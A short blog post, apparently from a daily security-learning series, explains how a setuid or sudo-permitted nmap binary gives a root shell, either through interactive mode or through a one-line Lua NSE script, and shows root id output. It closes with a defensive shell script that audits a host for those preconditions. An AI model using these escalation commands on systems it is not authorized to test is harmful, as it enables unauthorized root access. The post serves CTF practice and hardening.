Day 64: NMAP 2 ROOT FTW (with and without interactive mode)

Mar 4, 2019 · 1 min read

Today's post is short but sweet. You may have seen people using nmap to escalate privileges on Linux; this works when the binary has the setuid bit set, or when a sudoers rule lets you run it with NOPASSWD. It usually goes a little something like this…

nmap --interactive      (or: sudo nmap --interactive)
nmap> !sh
# id
uid=0(root) gid=0(root) groups=0(root)

This was fun for a long time, and even better when CTFs use it, as you can fly through with the good ol' nmap trick. But what about newer versions, where interactive mode is no longer present? Do not fear, nmap --script is here and ready to save the day.

echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)

Since the script is Lua (the language nmap's NSE scripts are written in, hence the .nse extension and os.execute call), get creative! Endless possibilities.
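From the defensive side, the two preconditions above are easy to audit. The POSIX shell helper below is an added example, not code from the original post: it flags an nmap binary with the setuid bit set and any sudoers rule granting nmap with NOPASSWD. The function names are this example's own, and reading /etc/sudoers normally requires root.

```shell
#!/bin/sh
# Added audit helper (not from the original post). It checks a host for the
# two preconditions the post relies on: an nmap binary with the setuid bit
# set, and a sudoers rule that lets a user run nmap with NOPASSWD.
# Function names are this example's own.

# Print sudoers rules (comments stripped) that grant nmap with NOPASSWD.
# Exit status 0 if at least one such rule exists, 1 otherwise.
# The path may be absolute (/usr/bin/nmap) or bare (nmap); "nmapfoo" is not a hit.
find_nopasswd_nmap_rules() {
    grep -v '^[[:space:]]*#' "$1" \
        | grep 'NOPASSWD' \
        | grep -E '(^|[[:space:],])(/[^[:space:],]*/)?nmap([[:space:],]|$)'
}

# Exit status 0 if the file exists and has its set-user-ID bit set.
is_setuid() {
    [ -u "$1" ]
}

# Walk the real system: the nmap on PATH plus /etc/sudoers and its drop-ins.
# Unreadable sudoers files are skipped. Returns 1 if anything risky was found.
audit_nmap_privesc() {
    status=0
    nmap_path=$(command -v nmap 2>/dev/null)
    if [ -n "$nmap_path" ] && is_setuid "$nmap_path"; then
        echo "RISK: $nmap_path is setuid; remediate with: chmod u-s $nmap_path"
        status=1
    fi
    for f in /etc/sudoers /etc/sudoers.d/*; do
        [ -r "$f" ] || continue
        rules=$(find_nopasswd_nmap_rules "$f") || continue
        printf 'RISK: %s grants nmap without a password:\n%s\n' "$f" "$rules"
        status=1
    done
    return "$status"
}

# Run the audit only when invoked as: sh audit.sh --run
if [ "${1:-}" = "--run" ]; then
    audit_nmap_privesc
fi
```

A rule hit means the listed user can get a root shell through the --script trick above, so the fix is to remove the setuid bit or drop nmap from the NOPASSWD rule.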
